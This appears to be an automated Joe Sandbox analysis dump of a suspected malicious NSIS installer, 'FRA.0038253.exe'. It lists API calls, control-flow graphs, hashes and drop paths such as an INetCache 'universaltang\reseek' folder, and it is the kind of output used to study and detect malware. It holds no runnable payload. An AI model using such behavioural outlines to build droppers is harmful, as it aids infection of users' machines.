                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,00000031), ref: 004017E7
                                                                            • Part of subcall function 00406257: lstrcpynA.KERNEL32(0000000C,0000000C,00000400,00403545,spidsmus,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406264
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek$C:\Users\user\AppData\Local\Temp\nspA3DD.tmp$C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll$Call
                                                                          • API String ID: 1941528284-3918142026
                                                                          • Opcode ID: 97f8a186605f93049767f2658230aac1478c04fcb5d232af0e8365a185111461
                                                                          • Instruction ID: d68083d7be573bf7b424bf06ea3a531533a5a02c0da8b97de7743fd59a514b88
                                                                          • Opcode Fuzzy Hash: 97f8a186605f93049767f2658230aac1478c04fcb5d232af0e8365a185111461
                                                                          • Instruction Fuzzy Hash: E241E471A04515BACF20BBB5CC45DAF3669EF41329B20823FF522F10E1D67C8A519AAD

                                                                          Control-flow Graph

                                                                          control_flow_graph 652 40539b-4053b0 653 405466-40546a 652->653 654 4053b6-4053c8 652->654 655 4053d3-4053df lstrlenA 654->655 656 4053ca-4053ce call 4062ea 654->656 658 4053e1-4053f1 lstrlenA 655->658 659 4053fc-405400 655->659 656->655 658->653 660 4053f3-4053f7 lstrcatA 658->660 661 405402-405409 SetWindowTextA 659->661 662 40540f-405413 659->662 660->659 661->662 663 405415-405457 SendMessageA * 3 662->663 664 405459-40545b 662->664 663->664 664->653 665 40545d-405460 664->665 665->653
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                          • lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                          • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                          • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                          • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll
                                                                          • API String ID: 2531174081-1519149975
                                                                          • Opcode ID: b7e689ba3568b45e661cc71a8209ba49a94a919dc578635e08100e76a75d270e
                                                                          • Instruction ID: 768db45cab79a8a24b618bf1c75d7959fc692146c09f0b07473e3771a574ba6b
                                                                          • Opcode Fuzzy Hash: b7e689ba3568b45e661cc71a8209ba49a94a919dc578635e08100e76a75d270e
                                                                          • Instruction Fuzzy Hash: E8218E71A00118BBCB11AFA5DD80ADFBFB9EF04354F14807AF944A6291C7798E908F98

                                                                          Control-flow Graph

                                                                          control_flow_graph 666 406611-406631 GetSystemDirectoryA 667 406633 666->667 668 406635-406637 666->668 667->668 669 406647-406649 668->669 670 406639-406641 668->670 672 40664a-40667c wsprintfA LoadLibraryExA 669->672 670->669 671 406643-406645 670->671 671->672
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406628
                                                                          • wsprintfA.USER32 ref: 00406661
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406675
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                                          • Instruction ID: 6072706d14593a5edd0f204686c44205f434de148f4e6431a115c2c8130293b5
                                                                          • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                                                          • Instruction Fuzzy Hash: 68F0FC7054020967DF1497A4DD0DFEB365CAB08308F14047AA547E10D1EAB9D4258B59

                                                                          Control-flow Graph

                                                                          control_flow_graph 673 403168-40317c 674 403185-40318d 673->674 675 40317e 673->675 676 403194-403199 674->676 677 40318f 674->677 675->674 678 4031a9-4031b6 call 403344 676->678 679 40319b-4031a4 call 40335a 676->679 677->676 683 4032fb 678->683 684 4031bc-4031c0 678->684 679->678 685 4032fd-4032fe 683->685 686 4032e4-4032e6 684->686 687 4031c6-4031e6 GetTickCount call 4067a4 684->687 689 40333d-403341 685->689 690 4032e8-4032eb 686->690 691 40332f-403333 686->691 697 40333a 687->697 699 4031ec-4031f4 687->699 692 4032f0-4032f9 call 403344 690->692 693 4032ed 690->693 694 403300-403306 691->694 695 403335 691->695 692->683 706 403337 692->706 693->692 700 403308 694->700 701 40330b-403319 call 403344 694->701 695->697 697->689 703 4031f6 699->703 704 4031f9-403207 call 403344 699->704 700->701 701->683 710 40331b-403327 call 405e91 701->710 703->704 704->683 711 40320d-403216 704->711 706->697 716 4032e0-4032e2 710->716 717 403329-40332c 710->717 713 40321c-403239 call 4067c4 711->713 719 4032dc-4032de 713->719 720 40323f-403256 GetTickCount 713->720 716->685 717->691 719->685 721 403258-403260 720->721 722 40329b-40329d 720->722 725 403262-403266 721->725 726 403268-403293 MulDiv wsprintfA call 40539b 721->726 723 4032d0-4032d4 722->723 724 40329f-4032a3 722->724 723->699 729 4032da 723->729 727 4032a5-4032aa call 405e91 724->727 728 4032b8-4032be 724->728 725->722 725->726 731 403298 726->731 734 4032af-4032b1 727->734 733 4032c4-4032c8 728->733 729->697 731->722 733->713 735 4032ce 733->735 734->716 736 4032b3-4032b6 734->736 735->697 736->733
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: ... %d%%

                                                                          APIs
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402DB4
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402E00
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E09
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E20
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E2B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CloseEnum$DeleteValue
                                                                          • String ID:

                                                                          APIs
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751D99
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751D9E
                                                                            • Part of subcall function 70751B28: GlobalFree.KERNEL32(?), ref: 70751DA3
                                                                          • GlobalFree.KERNEL32(00000000), ref: 70751816
                                                                          • FreeLibrary.KERNEL32(?), ref: 70751899
                                                                          • GlobalFree.KERNEL32(00000000), ref: 707518BE
                                                                            • Part of subcall function 7075233F: GlobalAlloc.KERNEL32(00000040,?), ref: 70752370
                                                                            • Part of subcall function 70752742: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,707517E7,00000000), ref: 70752812
                                                                            • Part of subcall function 707515FB: wsprintfA.USER32 ref: 70751629
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                          • String ID:

                                                                          APIs
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000023,00000011,00000002), ref: 004024EE
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 0040252E
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CloseValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405E2D
                                                                          • GetTempFileNameA.KERNELBASE(0000000C,?,00000000,?,?,004033A0,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008), ref: 00405E47
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020F5
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000,?), ref: 004053D4
                                                                            • Part of subcall function 0040539B: lstrlenA.KERNEL32(00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000,?,?,?,?,?,?,?,?,?,00403298,00000000), ref: 004053E4
                                                                            • Part of subcall function 0040539B: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00403298,00403298,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,00000000,004178D8,00000000), ref: 004053F7
                                                                            • Part of subcall function 0040539B: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 00405409
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040542F
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405449
                                                                            • Part of subcall function 0040539B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405457
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402105
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00402115
                                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040217F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          APIs
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(?,?,00421D28,0000000C,00405CEE,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FRA.0038253.exe"), ref: 00405C90
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405C95
                                                                            • Part of subcall function 00405C82: CharNextA.USER32(00000000), ref: 00405CA9
                                                                          • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401632
                                                                            • Part of subcall function 00405861: CreateDirectoryA.KERNELBASE(?,?), ref: 004058A3
                                                                          • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek,00000000,00000000,000000F0), ref: 00401661
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek, xrefs: 00401656
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\mars\universaltang\reseek
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,Call,?,?,?,?,00000000,?,?,004063FC,80000002), ref: 00406184
                                                                          • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?,?,Skipped: C:\Users\user\AppData\Local\Temp\nspA3DD.tmp\System.dll), ref: 0040618F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID: Call
                                                                          • API String ID: 3356406503-1824292864
                                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction ID: 76517841fcd29efece62e5e1a2c360dd076a242d2a9727e46a6747b1579fdab2
                                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                                          • Instruction Fuzzy Hash: 8F017C72500209ABDF22CF61CC09FDB3FACEF55364F05803AF956A6192D278D964DBA4
                                                                          APIs
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00401C1B
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000404), ref: 00401C2D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Similarity
                                                                          • API ID: Global$AllocFree
                                                                          • String ID: Call
                                                                          • API String ID: 3394109436-1824292864
                                                                          • Opcode ID: 2d11fc407f55666b2297ede61233392b299267979b0b2947b3ab3e1258a1f801
                                                                          • Instruction ID: 7cc70c40f421edf6522644ccb956ba00ea718e3585232f5ec85d51c9bef40d0d
                                                                          • Opcode Fuzzy Hash: 2d11fc407f55666b2297ede61233392b299267979b0b2947b3ab3e1258a1f801
                                                                          • Instruction Fuzzy Hash: 072181B2600104ABDB20FBA48E84E5F73A9EB44318721453BF602B32D1DB7C98129B5D
                                                                          APIs
                                                                            • Part of subcall function 004065EA: FindFirstFileA.KERNELBASE(77673410,00422170,00421D28,00405D1A,00421D28,00421D28,00000000,00421D28,00421D28,77673410,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,77673410,C:\Users\user\AppData\Local\Temp\), ref: 004065F5
                                                                            • Part of subcall function 004065EA: FindClose.KERNEL32(00000000), ref: 00406601
                                                                          • lstrlenA.KERNEL32 ref: 00402358
                                                                          • lstrlenA.KERNEL32(00000000), ref: 00402362
                                                                          • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 0040238A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2675644289.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675700198.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000420000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000042A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675726026.000000000043D000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2675926012.0000000000440000.00000002.00000001.01000000.00000003.sdmp
                                                                          Similarity
                                                                          • API ID: FileFindlstrlen$CloseFirstOperation
                                                                          • String ID:
                                                                          APIs
                                                                          • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025E7
                                                                          • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 004025FA
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Similarity
                                                                          • API ID: Enum$CloseValue
                                                                          • String ID:
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE(00000000,00000000,?,?,?,?), ref: 00402573
                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nspA3DD.tmp,00000000,00000011,00000002), ref: 00402612
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          APIs
                                                                          • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                          • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                          Similarity
                                                                          • API ID: MessageSend
                                                                          • String ID:
                                                                          APIs
                                                                          • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040246F
                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00402478
                                                                          Similarity
                                                                          • API ID: CloseDeleteValue
                                                                          • String ID:
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?), ref: 004058A3
                                                                          • GetLastError.KERNEL32 ref: 004058B1
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422128,00426800,00426800,00426800,?,920,00000000), ref: 00405919
                                                                          • CloseHandle.KERNEL32(?), ref: 00405926
                                                                          Similarity
                                                                          • API ID: CloseCreateHandleProcess
                                                                          • String ID:
                                                                          APIs
                                                                          • ShowWindow.USER32(0001045C), ref: 004015A6
                                                                          • ShowWindow.USER32(00010456), ref: 004015BB
                                                                          Similarity
                                                                          • API ID: ShowWindow
                                                                          • String ID:
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(?,00000000,?,004034E4,0000000C), ref: 00406691
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004066AC
                                                                            • Part of subcall function 00406611: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406628
                                                                            • Part of subcall function 00406611: wsprintfA.USER32 ref: 00406661
                                                                            • Part of subcall function 00406611: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406675
                                                                          Similarity
                                                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                          • String ID:
                                                                          • API String ID: 2547128583-0
                                                                          • Opcode ID: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                                          • Instruction ID: b822115cc93c87e4770b1e8a92c35aa845e39af966f392d1223ab81df9f7854c
                                                                          • Opcode Fuzzy Hash: 6364b50fcd8a78884de1a109c3061c8e2e734accc18c0610f9b5885e266cf418
                                                                          • Instruction Fuzzy Hash: 92E08633504210AAD611A7709E0883762AC9E867043060C3EF543F6240DB399C729A6E
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(00000003,00402F71,C:\Users\user\Desktop\FRA.0038253.exe,80000000,00000003,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405DEE
                                                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036EC,?,?,00000008,0000000A,0000000C), ref: 00405E10
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: File$AttributesCreate
                                                                          • String ID:
                                                                          • API String ID: 415043291-0
                                                                          • Opcode ID: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                                          • Instruction ID: 0febe3887fb1e567d40345103610fd6f3e8d71b3c6328ccb34cdb50f288ecb70
                                                                          • Opcode Fuzzy Hash: 4c035aff046b4d43788645f88f630755698ea216f1f6cd5eefec511dda558379
                                                                          • Instruction Fuzzy Hash: 23D09E31254301AFEF099F20DE16F2E7AA2EB84B00F11952CB682A41E0DA7158299B15
                                                                          APIs
                                                                          • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                          • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                                                          • Instruction ID: d43436b973e76c4b01283cada394ff82e8112d3abf3e5048573654bb382d62e0
                                                                          • Opcode Fuzzy Hash: 96c7ec262ab61fe6fea47152b5241fdb13327e4bfef36903235a76d16f55e530
                                                                          • Instruction Fuzzy Hash: C0D012725046206FC6113728EF0C89BBF55DB543717028F36F9A9A22F0CB304C56CB98
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,00000000,00403395,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040367F,?,00000008,0000000A,0000000C), ref: 004058C1
                                                                          • GetLastError.KERNEL32(?,00000008,0000000A,0000000C), ref: 004058CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectoryErrorLast
                                                                          • String ID:
                                                                          • API String ID: 1375471231-0
                                                                          • Opcode ID: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                          • Instruction ID: 30906a006ed9b45dc4efc70bb32269664e7cf578bac73b30a6d1da3a92a0b104
                                                                          • Opcode Fuzzy Hash: 7ce514c051633c67dabed91c1ba2c830ad6f4192d7236d4c27a26ed09d9cb01d
                                                                          • Instruction Fuzzy Hash: 6AC04C71214A06DAD6506B219F087177BA5AB50741F25843AAA87F40A0DE3484A9DA2D
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(00000000), ref: 70752B87
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2702525007.0000000070751000.00000020.00000001.01000000.00000006.sdmp, Offset: 70750000, based on PE: true
                                                                          • Associated: 00000000.00000002.2702483320.0000000070750000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702568520.0000000070754000.00000002.00000001.01000000.00000006.sdmp
                                                                          • Associated: 00000000.00000002.2702605900.0000000070756000.00000002.00000001.01000000.00000006.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_70750000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: dd62cd24c062b699ea9ffe88cc8f086b5c46639b91fb741fce397e6fc44e5d03
                                                                          • Instruction ID: 8e9e0a55b4eafc15534206563ba69ead7d6ece57e30a1b5a61044d6cacdd76bf
                                                                          • Opcode Fuzzy Hash: dd62cd24c062b699ea9ffe88cc8f086b5c46639b91fb741fce397e6fc44e5d03
                                                                          • Instruction Fuzzy Hash: 6E418272900209DFDB21DF75DE96BDD3775EB06354F708825F809C71A0D634A84A8BE5
                                                                          APIs
                                                                          • WritePrivateProfileStringA.KERNEL32(00000000,00000000,?,00000000), ref: 00402402
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2675669444.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_FRA.jbxd
                                                                          Similarity
                                                                          • API ID: PrivateProfileStringWrite
                                                                          • String ID:
                                                                          • API String ID: 390214022-0
                                                                          • Opcode ID: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                          • Instruction ID: f24de8215b53ecbcf80a61348f6bfc7870897c54b3e6c90e9d08f7162164e460
                                                                          • Opcode Fuzzy Hash: 3326b8378841c5f3540bed9b182ec42c057636b7d1278427695ffb5e145c9da6
                                                                          • Instruction Fuzzy Hash: 9DE04F3160413A6BEB6036B11F8D97F2159AB84314B14053EBA11B62C6D9FC8E8352A9
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402D0F,00000000,?,?), ref: 00406134
